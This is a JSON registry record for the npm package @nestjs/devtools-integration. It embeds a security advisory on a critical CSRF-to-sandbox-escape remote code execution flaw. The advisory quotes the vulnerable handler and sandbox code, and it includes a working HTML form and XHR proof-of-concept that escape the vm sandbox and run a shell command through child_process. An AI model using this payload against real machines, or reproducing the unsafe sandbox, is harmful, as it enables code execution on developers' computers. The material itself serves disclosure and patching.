{"id":6334632,"name":"@nestjs/devtools-integration","ecosystem":"npm","description":"Nest - modern, fast, powerful node.js web framework (@devtools-integration)","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"","keywords_array":[],"namespace":"nestjs","versions_count":15,"first_release_published_at":"2023-02-14T10:49:40.592Z","latest_release_published_at":"2025-07-29T10:47:01.706Z","latest_release_number":"0.2.1","last_synced_at":"2026-06-15T15:02:36.605Z","created_at":"2023-02-14T12:41:15.607Z","updated_at":"2026-06-15T15:02:36.606Z","registry_url":"https://www.npmjs.com/package/@nestjs/devtools-integration","install_command":"npm install @nestjs/devtools-integration","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"latest":"0.2.1"}},"repo_metadata":null,"repo_metadata_updated_at":null,"dependent_packages_count":8,"downloads":389889,"downloads_period":"last-month","dependent_repos_count":71,"rankings":{"downloads":0.6543063000140922,"dependent_repos_count":1.6220337126923823,"dependent_packages_count":2.4808525743710947,"stargazers_count":null,"forks_count":null,"docker_downloads_count":1.6684708819313105,"average":1.60641586725222},"purl":"pkg:npm/%40nestjs/devtools-integration","advisories":[{"uuid":"GSA_kwCzR0hTQS04NWNnLWNtcTUtcWptN84ABKuT","url":"https://github.com/advisories/GHSA-85cg-cmq5-qjm7","title":"@nestjs/devtools-integration: CSRF to Sandbox Escape Allows for RCE against JS Developers","description":"## Summary\nA critical Remote Code Execution (RCE) vulnerability was discovered in the `@nestjs/devtools-integration` package. When enabled, the package exposes a local development HTTP server with an API endpoint that uses an unsafe JavaScript sandbox (`safe-eval`-like implementation). Due to improper sandboxing and missing cross-origin protections, any malicious website visited by a developer can execute arbitrary code on their local machine.\n\nA full blog post about how this vulnerability was uncovered can be found on [Socket's blog](https://socket.dev/blog/nestjs-rce-vuln).\n\n## Details\nThe `@nestjs/devtools-integration` package adds HTTP endpoints to a locally running NestJS development server. One of these endpoints, `/inspector/graph/interact`, accepts JSON input containing a `code` field and executes the provided code in a Node.js `vm.runInNewContext` sandbox.\n\nKey issues:\n1. **Unsafe Sandbox:** The sandbox implementation closely resembles the abandoned `safe-eval` library. The Node.js `vm` module is [explicitly documented](https://nodejs.org/api/vm.html) as not providing a security mechanism for executing untrusted code. Numerous known sandbox escape techniques allow arbitrary code execution.\n2. **Lack of Proper CORS/Origin Checking:** The server sets `Access-Control-Allow-Origin` to a fixed domain (`https://devtools.nestjs.com`) but does not validate the request's `Origin` or `Content-Type`. Attackers can craft POST requests with `text/plain` content type using HTML forms or simple XHR requests, bypassing CORS preflight checks.\n\nBy chaining these issues, a malicious website can trigger the vulnerable endpoint and achieve arbitrary code execution on a developer's machine running the NestJS devtools integration.\n\nRelevant code from the package:\n\n```js\n// Vulnerable request handler\nhandleGraphInteraction(req, res) {\n  if (req.method === 'POST') {\n    let body = '';\n    req.on('data', data =\u003e { body += data; });\n    req.on('end', async () =\u003e {\n      res.writeHead(200, { 'Content-Type': 'application/plain' });\n      const json = JSON.parse(body);\n      await this.sandboxedCodeExecutor.execute(json.code, res);\n    });\n  }\n}\n\n// Vulnerable sandbox implementation\nrunInNewContext(code, context, opts) {\n  const sandbox = {};\n  const resultKey = 'SAFE_EVAL_' + Math.floor(Math.random() * 1000000);\n  sandbox[resultKey] = {};\n  const ctx = `\n    (function() {\n      Function = undefined;\n      const keys = Object.getOwnPropertyNames(this).concat(['constructor']);\n      keys.forEach((key) =\u003e {\n        const item = this[key];\n        if (!item || typeof item.constructor !== 'function') return;\n        this[key].constructor = undefined;\n      });\n    })();\n  `;\n  code = ctx + resultKey + '=' + code;\n  if (context) {\n    Object.keys(context).forEach(key =\u003e { sandbox[key] = context[key]; });\n  }\n  vm.runInNewContext(code, sandbox, opts);\n  return sandbox[resultKey];\n}\n```\n\nBecause the sandbox can be trivially escaped, and the endpoint accepts cross-origin POST requests without proper checks, this vulnerability allows arbitrary code execution on the developer's machine.\n\n## PoC\nCreate a minimal NestJS project and enable @nestjs/devtools-integration in development mode:\n\n```\nnpm install @nestjs/devtools-integration\nnpm run start:dev\n```\n\nUse the following HTML form on any malicious website:\n\n\n```html\n\u003cform action=\"http://localhost:8000/inspector/graph/interact\" method=\"POST\" enctype=\"text/plain\"\u003e\n  \u003cinput name=\"{\u0026quot;code\u0026quot;:\u0026quot;(function(){try{propertyIsEnumerable.call()}catch(pp){pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('open /System/Applications/Calculator.app')}})()\u0026quot;,\u0026quot;bogus\u0026quot;:\u0026quot;\" value=\"\u0026quot;}\" /\u003e\n  \u003cinput type=\"submit\" value=\"Exploit\" /\u003e\n\u003c/form\u003e\n```\n\nWhen the developer visits the page and submits the form, the local NestJS devtools server executes the injected code, in this case launching the Calculator app on macOS.\n\nAlternatively, the same payload can be sent via a simple XHR request with text/plain content type:\n\n```html\n\u003cbutton onclick=\"sendPopCalculatorXHR()\"\u003eSend pop calculator XHR Request\u003c/button\u003e\n\u003cscript\u003e\n    function sendPopCalculatorXHR() {\n        var xhr = new XMLHttpRequest();\n        xhr.open(\"POST\", \"http://localhost:8000/inspector/graph/interact\");\n        xhr.withCredentials = false;\n        xhr.setRequestHeader(\"Content-Type\", \"text/plain\");\n        xhr.send('{\"code\":\"(function() { try{ propertyIsEnumerable.call(); } catch(pp){ pp.constructor.constructor(\\'return process\\')().mainModule.require(\\'child_process\\').execSync(\\'open /System/Applications/Calculator.app\\'); } })()\"}');\n    }\n\u003c/script\u003e\n```\n\n### Full POC\n\nMinimal reproducer: https://github.com/JLLeitschuh/nestjs-typescript-starter-w-devtools-integration\n\nSteps to reproduce:\n\n1. Clone Repo https://github.com/JLLeitschuh/nestjs-typescript-starter-w-devtools-integration\n2. Run NPM install\n3. Run `npm run start:dev`\n4. Open up the POC site here: https://jlleitschuh.org/nestjs-devtools-integration-rce-poc/\n5. Try out any of the POC payloads.\n\nSource for the `nestjs-devtools-integration-rce-poc`: https://github.com/JLLeitschuh/nestjs-devtools-integration-rce-poc\n\n## Impact\n\nThis vulnerability is a Remote Code Execution (RCE) affecting developers running a NestJS project with `@nestjs/devtools-integration` enabled. An attacker can exploit it by luring a developer to visit a malicious website, which then sends a crafted POST request to the local devtools HTTP server. This results in arbitrary code execution on the developer’s machine.\n\n- Severity: Critical\n- Attack Complexity: Low (requires only that the victim visits a malicious webpage, or be served malvertising)\n- Privileges Required: None\n- User Interaction: Minimal (no clicks required)\n\n## Fix\nThe maintainers remediated this issue by:\n\n - Replacing the unsafe sandbox implementation with a safer alternative (@nyariv/sandboxjs).\n - Adding origin and content-type validation to incoming requests.\n - Introducing authentication for the devtools connection.\n\nUsers should upgrade to the patched version of @nestjs/devtools-integration as soon as possible.\n\n## Credit\n\nThis vulnerability was uncovered by @JLLeitschuh on behalf of [Socket](https://socket.dev/).","origin":"UNSPECIFIED","severity":"CRITICAL","published_at":"2025-08-01T18:43:13.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":9.4,"cvss_vector":"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H","references":["https://github.com/nestjs/nest/security/advisories/GHSA-85cg-cmq5-qjm7","https://github.com/JLLeitschuh/nestjs-typescript-starter-w-devtools-integration","https://jlleitschuh.org/nestjs-devtools-integration-rce-poc","https://socket.dev/blog/nestjs-rce-vuln","https://nvd.nist.gov/vuln/detail/CVE-2025-54782","https://github.com/JLLeitschuh/nestjs-devtools-integration-rce-poc","https://nodejs.org/api/vm.html","https://github.com/advisories/GHSA-85cg-cmq5-qjm7"],"source_kind":"github","identifiers":["GHSA-85cg-cmq5-qjm7","CVE-2025-54782"],"repository_url":"https://github.com/nestjs/nest","blast_radius":17.40182847795931,"created_at":"2025-08-04T08:10:46.873Z","updated_at":"2026-06-03T15:03:47.293Z","epss_percentage":0.35077,"epss_percentile":0.97114,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04NWNnLWNtcTUtcWptN84ABKuT","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04NWNnLWNtcTUtcWptN84ABKuT","packages":[{"ecosystem":"npm","package_name":"@nestjs/devtools-integration","versions":[{"first_patched_version":"0.2.1","vulnerable_version_range":"\u003c= 0.2.0"}],"purl":"pkg:npm/%40nestjs%2Fdevtools-integration"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04NWNnLWNtcTUtcWptN84ABKuT/related_packages","related_advisories":[]}],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@nestjs/devtools-integration","docker_dependents_count":10,"docker_downloads_count":2830,"usage_url":"https://repos.ecosyste.ms/usage/npm/@nestjs/devtools-integration","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@nestjs/devtools-integration/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nestjs%2Fdevtools-integration/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nestjs%2Fdevtools-integration/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nestjs%2Fdevtools-integration/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nestjs%2Fdevtools-integration/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nestjs%2Fdevtools-integration/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nestjs%2Fdevtools-integration/codemeta","maintainers":[{"uuid":"nestjscore","login":"nestjscore","name":null,"email":"admin@kamilmysliwiec.com","url":null,"packages_count":45,"html_url":"https://www.npmjs.com/~nestjscore","role":null,"created_at":"2023-02-14T13:25:02.582Z","updated_at":"2023-02-14T13:25:02.582Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nestjscore/packages"},{"uuid":"kamilmysliwiec","login":"kamilmysliwiec","name":null,"email":"mail@kamilmysliwiec.com","url":null,"packages_count":43,"html_url":"https://www.npmjs.com/~kamilmysliwiec","role":null,"created_at":"2023-02-14T13:25:02.672Z","updated_at":"2023-02-14T13:25:02.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/kamilmysliwiec/packages"}]}